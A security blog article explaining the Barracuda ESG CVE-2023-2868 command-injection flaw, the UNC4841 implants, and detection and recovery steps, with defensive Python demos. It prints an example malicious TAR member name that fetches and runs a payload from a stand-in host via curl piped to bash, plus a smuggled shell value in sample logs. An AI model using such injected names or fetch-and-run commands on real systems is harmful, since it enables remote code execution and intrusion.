Barracuda ESG CVE-2023-2868: The Zero-Day That Needed Hardware Replacement
Cybersecurity
Command injection in Barracuda ESG let APT UNC4841 root appliances so deeply that Barracuda issued an extraordinary directive: replace the physical hardware, not a software patch.
By Arjun Raghavan, Security & Systems Lead, BIPI · November 7, 2024 · 10 min read
CVE-2023-2868 is a remote command injection vulnerability in Barracuda Email Security Gateway (ESG) appliances running firmware 5.1.3.001 through 9.2.0.006. It sits in the code path that screens TAR archive attachments on inbound email: member filenames read from the archive are passed to a Perl qx() call without adequate validation, so a crafted name becomes a command that runs with the privileges of the ESG scanning process. No user interaction is needed beyond the appliance receiving the message. CVSS 3.1 base score: 9.8 (Critical).
Technical Root Cause: Perl qx() Injection
The attachment screening code uses Perl's qx() operator (the same thing as backticks) to run a system command whose argument string includes the archive member's filename. qx() hands that string to /bin/sh, so any shell metacharacters in the name are expanded before the intended command ever runs. Because the name comes straight from the TAR header, the attacker controls it completely: a member named, for example, $(curl http://c2.evil/payload | bash) makes the scanning daemon fetch and execute the payload the moment it processes the inbound email. The lasting fix is not better escaping; it is never passing an attacker-controlled string through a shell at all.
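To make the bug class concrete, here is an added Python example; it is not Barracuda's code (which is Perl and not public), but the same pattern expressed with subprocess: a member name interpolated into a shell command string (the analogue of qx("... $name ...")) beside the hardened form, which invokes the scanner with an argv list and no shell and rejects member names outside a strict allowlist before they reach any subprocess. The TAR is constructed in memory, `echo` stands in for the real scanner binary, and the member name `invoice.pdf$(echo INJECTED)` carries a harmless substitution so the demo is safe to run offline.

```python
import io
import re
import subprocess
import tarfile

# Constructed sample member name: a benign command substitution stands in for
# the attacker's payload so the demo is safe to run offline.
MALICIOUS_NAME = "invoice.pdf$(echo INJECTED)"

# Allowlist for member names (assumption for this example): letters, digits,
# dot, underscore, slash, space and hyphen, at most 255 characters.
SAFE_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._/ -]{0,254}")


def build_tar(member_name):
    """Build an in-memory TAR whose single member carries member_name in its
    header. Nothing in the TAR format stops a name from holding `$(...)`."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        data = b"not really a pdf"
        info = tarfile.TarInfo(name=member_name)
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def member_names(tar_bytes):
    """Read member names back exactly as stored in the headers."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        return [m.name for m in tar.getmembers()]


def scan_vulnerable(name):
    """The bug class: the member name is spliced into a command string that a
    shell then parses, which is what Perl's qx("... $name ...") does.
    The shell expands $(echo INJECTED) before `echo` runs."""
    cmd = "echo scanning %s" % name
    done = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return done.stdout.strip()


def scan_hardened(name):
    """No shell at all: an argv list, and the name is one opaque argument."""
    done = subprocess.run(["echo", "scanning", name],
                          capture_output=True, text=True)
    return done.stdout.strip()


def scan_archive(tar_bytes):
    """Defence in depth: refuse names outside the allowlist before they reach
    any subprocess, then invoke the scanner without a shell."""
    results = {}
    for name in member_names(tar_bytes):
        if not SAFE_NAME_RE.fullmatch(name):
            results[name] = "rejected: unsafe member name"
            continue
        results[name] = scan_hardened(name)
    return results


if __name__ == "__main__":
    evil = build_tar(MALICIOUS_NAME)
    print("vulnerable:", scan_vulnerable(MALICIOUS_NAME))
    print("hardened:  ", scan_hardened(MALICIOUS_NAME))
    print("gated:     ", scan_archive(evil))
```

The vulnerable path prints `scanning invoice.pdfINJECTED`: the substitution ran inside the shell. The hardened path prints the name verbatim because no shell ever parsed it, and the gated path never invokes the scanner for that member. In Perl the equivalent of the argv-list call is the list form of system() or a three-or-more-argument open(), which bypasses the shell entirely.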
Affected Versions
- Barracuda ESG firmware 5.1.3.001 through 9.2.0.006 (every release in this range)
- Both physical ESG appliances and ESG virtual appliances, which run the same firmware
- Barracuda Email Security Service (cloud SaaS) is NOT affected
- Other Barracuda product lines are NOT affected by this specific CVE
Threat Actor UNC4841 and Campaign Scope
Mandiant (now part of Google Cloud) attributed the exploitation to UNC4841, a China-nexus threat actor assessed to conduct espionage in support of the People's Republic of China. Exploitation began as early as October 2022, roughly seven months before Barracuda identified the vulnerability and disclosed it in May 2023. The campaign targeted government agencies, military contractors, defense industrial base organizations, and telecommunications companies across North America, Europe, and the APAC region.
- Deployed SALTWATER: a trojanized module (mod_udp.so) of the Barracuda SMTP daemon bsmtpd, with backdoor capabilities including file upload and download, command execution, and proxying
- Deployed SEASPY: an x64 ELF persistence backdoor posing as a legitimate Barracuda service (BarracudaMailService) that installs itself as a PCAP filter on port 25 and activates on a "magic packet"
- Deployed SEASIDE: a Lua module for bsmtpd that watches SMTP HELO/EHLO commands for a C2 address and opens a reverse shell
- Deployed SUBMARINE (tracked by Mandiant as DEPTHCHARGE): a multi-component backdoor anchored in the appliance's SQL database
- Maintained access through multiple persistence mechanisms simultaneously
SUBMARINE is the implant that most directly defeated software-only remediation. CISA's analysis describes it as a SQL trigger, shell scripts, and a shared library loaded into a Linux daemon that together provide root execution, persistence, command and control, and cleanup. The SQL trigger is the persistence anchor: it lives in the appliance's database rather than only on disk, so cleaning files the trigger can regenerate achieves nothing, and anything that restores database-backed configuration can fire it again. It is not accurate to say SUBMARINE had no file-system presence; the point is that file-based forensics and file-based cleanup see only the parts the database can put back.
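The hunting consequence is that the database schema itself becomes an artifact to baseline. The added Python example below (mine, not Barracuda's or CISA's tooling) uses an in-memory SQLite database as a stand-in for the appliance's MySQL instance: it fingerprints every table and trigger in a constructed clean schema, compares a constructed "live" schema that carries a tampered legitimate trigger plus a planted table and trigger, and then shows that the planted trigger fires when a configuration row is inserted, which is exactly the path a restore takes. The table names, trigger names and the trigger body (`/tmp/.cache/run.sh`) are illustrative inventions, not SUBMARINE's real components.

```python
import hashlib
import sqlite3

# Constructed baseline schema standing in for a clean appliance database.
# Names are illustrative; they are not Barracuda's real schema.
BASELINE_SQL = """
CREATE TABLE config (k TEXT PRIMARY KEY, v TEXT);
CREATE TABLE audit (id INTEGER PRIMARY KEY, k TEXT, at TEXT);
CREATE TRIGGER audit_cfg AFTER UPDATE ON config
BEGIN INSERT INTO audit (k, at) VALUES (NEW.k, datetime('now')); END;
"""

# Constructed "live" schema from a compromised unit: the legitimate audit_cfg
# trigger has an extra statement spliced in, and a planted tasks table plus a
# trigger re-seed a job whenever configuration rows are (re)inserted, i.e. on
# a config restore. The trigger bodies are harmless stand-ins.
LIVE_SQL = """
CREATE TABLE config (k TEXT PRIMARY KEY, v TEXT);
CREATE TABLE audit (id INTEGER PRIMARY KEY, k TEXT, at TEXT);
CREATE TABLE tasks (id INTEGER PRIMARY KEY, cmd TEXT);
CREATE TRIGGER audit_cfg AFTER UPDATE ON config
BEGIN INSERT INTO audit (k, at) VALUES (NEW.k, datetime('now'));
      INSERT INTO tasks (cmd) VALUES ('/tmp/.cache/run.sh'); END;
CREATE TRIGGER cfg_restore AFTER INSERT ON config
BEGIN INSERT INTO tasks (cmd) VALUES ('/tmp/.cache/run.sh'); END;
"""


def open_db(schema_sql):
    """Create an in-memory database with the given schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(schema_sql)
    return conn


def schema_fingerprint(conn):
    """Map each (type, name) in sqlite_master to a SHA-256 of its
    whitespace-normalized CREATE statement. Auto-indexes carry NULL sql and
    are skipped. On MySQL the equivalent source is information_schema."""
    rows = conn.execute(
        "SELECT type, name, sql FROM sqlite_master WHERE sql IS NOT NULL"
    ).fetchall()
    return {
        (t, n): hashlib.sha256(" ".join(s.split()).encode()).hexdigest()
        for t, n, s in rows
    }


def hunt(baseline, live):
    """Report objects in the live schema that the baseline lacks or whose
    definition differs: ('unexpected'|'modified', type, name)."""
    findings = []
    for key, digest in live.items():
        if key not in baseline:
            findings.append(("unexpected",) + key)
        elif baseline[key] != digest:
            findings.append(("modified",) + key)
    return sorted(findings)


def trigger_fires_on_restore(conn):
    """Insert one config row, as a restore would, and count the jobs the
    planted trigger queued as a result."""
    conn.execute("INSERT INTO config (k, v) VALUES ('smtp.banner', 'ESG')")
    return conn.execute("SELECT COUNT(*) FROM tasks").fetchone()[0]


def demo():
    """Run the hunt and the restore check; returns (findings, queued_jobs)."""
    baseline = schema_fingerprint(open_db(BASELINE_SQL))
    live_conn = open_db(LIVE_SQL)
    findings = hunt(baseline, schema_fingerprint(live_conn))
    return findings, trigger_fires_on_restore(live_conn)


if __name__ == "__main__":
    for finding in demo()[0]:
        print(*finding)
```

The hunt reports the tampered `audit_cfg` trigger as modified and `tasks` and `cfg_restore` as unexpected, and a single inserted config row is enough to queue a job. A baseline taken from a known-clean install of the same firmware version is the prerequisite; without one, the only workable comparison is against what the vendor says the schema should contain.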
Why Barracuda Ordered Hardware Replacement
Barracuda shipped patches on May 20 and 21, 2023. Then, on June 6, 2023, it took the unusual step of telling customers that impacted ESG appliances must be replaced immediately, regardless of patch level. The rationale was that UNC4841's persistence mechanisms, SUBMARINE above all, were entangled with the appliance's firmware and database to a degree that no software-only remediation could restore confidence in the device's integrity. The FBI's August 2023 flash alert reiterated the point: the patches were ineffective against appliances that had already been compromised, and replacement was the only sound course.
Detection Artifacts
- Outbound connections from the ESG to destinations other than the vendor's update and support infrastructure, particularly from bsmtpd or its child processes
- Files named score.txt, modules.conf, or bsmtpd in unexpected paths (bsmtpd itself is the legitimate SMTP daemon; what matters is a copy, or a module it loads such as SALTWATER's mod_udp.so, outside its normal location)
- SMTP HELO/EHLO arguments that are not hostnames or address literals (SEASIDE takes its C2 address from this field)
- Tables, triggers, or rows in the appliance database that do not match the shipped schema (SUBMARINE's persistence anchor)
- Unexplained increases in ESG memory usage or process counts
Customers have limited shell access to the appliance, so several of these are vendor-side checks; the network-visible ones (outbound connections and SMTP traffic) are the ones a customer can run independently.
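The two network-visible indicators above can be checked from telemetry a customer already has. The added Python example below (mine, not vendor tooling) runs both over constructed sample lines in a simplified syslog-like format that is not real ESG output: it flags HELO/EHLO arguments that are not plausible hostnames or address literals, and it flags outbound flows from the appliance's IP to destinations outside an allowlist. The ESG address (10.0.5.20), the allowlist ranges (198.18.0.0/15 for "vendor infrastructure", 10.0.5.0/24 for local services), and every log line are assumptions for the example; real values come from your own inventory and the vendor's published IOCs.

```python
import ipaddress
import re

# Constructed sample SMTP session lines (not real Barracuda ESG log output).
SMTP_LOG = [
    "2023-05-20T03:14:07Z smtpd[2231]: client=203.0.113.9 EHLO mail.example.net",
    "2023-05-20T03:14:09Z smtpd[2231]: client=198.51.100.77 HELO aGVsbG8gd29ybGQ6MTk4LjUxLjEwMC41MDo0NDM=",
    "2023-05-20T03:14:11Z smtpd[2231]: client=192.0.2.44 HELO [192.0.2.44]",
    "2023-05-20T03:14:15Z smtpd[2231]: client=198.51.100.78 EHLO x;id>/tmp/o",
]

# Constructed sample connection-tracking lines for the appliance (not real).
CONN_LOG = [
    "2023-05-20T03:15:01Z conntrack: src=10.0.5.20 dst=198.18.7.10 dport=443 proto=tcp",
    "2023-05-20T03:15:04Z conntrack: src=10.0.5.20 dst=10.0.5.53 dport=53 proto=udp",
    "2023-05-20T03:15:09Z conntrack: src=10.0.5.20 dst=203.0.113.200 dport=8080 proto=tcp",
]

# Assumed appliance address and allowed destinations for this example only.
ESG_IP = "10.0.5.20"
ALLOWED_DST = [ipaddress.ip_network(n) for n in ("198.18.0.0/15", "10.0.5.0/24")]

HELO_RE = re.compile(r"\b(HELO|EHLO)\s+(\S+)\s*$")
LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")
CONN_RE = re.compile(r"src=(\S+) dst=(\S+) dport=(\d+)")


def helo_arg_is_plausible(arg):
    """A legitimate HELO/EHLO argument is a hostname (RFC-style labels joined
    by dots, at most 253 characters) or a bracketed address literal. Anything
    else, such as a base64 blob or shell metacharacters, deserves a look."""
    if arg.startswith("[") and arg.endswith("]"):
        try:
            ipaddress.ip_address(arg[1:-1])
            return True
        except ValueError:
            return False
    if len(arg) > 253:
        return False
    return all(LABEL_RE.match(label) for label in arg.split("."))


def suspicious_helos(lines):
    """Return the log lines whose HELO/EHLO argument is not plausible."""
    hits = []
    for line in lines:
        m = HELO_RE.search(line)
        if m and not helo_arg_is_plausible(m.group(2)):
            hits.append(line)
    return hits


def unexpected_outbound(lines, esg_ip, allowed):
    """Return flows sourced from the appliance whose destination is outside
    every allowed network."""
    hits = []
    for line in lines:
        m = CONN_RE.search(line)
        if not m or m.group(1) != esg_ip:
            continue
        dst = ipaddress.ip_address(m.group(2))
        if not any(dst in net for net in allowed):
            hits.append(line)
    return hits


if __name__ == "__main__":
    for line in suspicious_helos(SMTP_LOG):
        print("HELO:", line)
    for line in unexpected_outbound(CONN_LOG, ESG_IP, ALLOWED_DST):
        print("EGRESS:", line)
```

The hostname check is a heuristic: an attacker can choose an argument that passes it, so treat a hit as a reason to pull the full session rather than as proof, and pair it with the vendor's IOC list. The egress check is the stronger control, because an email gateway has a very small legitimate set of outbound destinations and anything outside it should page someone.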
Remediation and Recovery
- Follow Barracuda's directive and replace the ESG appliance; do not treat a patched appliance as clean
- Preserve a forensic image of the old appliance before decommissioning, and keep it powered down and isolated until the image is verified
- Rotate every credential that touched the compromised ESG: LDAP/AD bind accounts, Barracuda Cloud Control, FTP and SMB accounts used for backups, and any private TLS certificates and keys installed on the device
- Review mail logs and egress logs for evidence of data exfiltration across the full exposure window, which may start in October 2022 rather than at disclosure
- Deploy the replacement on a fresh network segment with configuration rebuilt by hand; do not restore a configuration backup taken from the compromised appliance, since database-resident persistence can travel with it
- Engage Mandiant or an equivalent IR firm if government sector or classified data is involved
Structural Lessons for Email Security Appliances
- Treat email security appliances as high-value targets requiring equivalent monitoring to endpoints
- Subscribe to vendor security notifications with next-business-day response SLAs
- Establish playbooks for appliance replacement, not just software patching
- Log all outbound connections from email security infrastructure to SIEM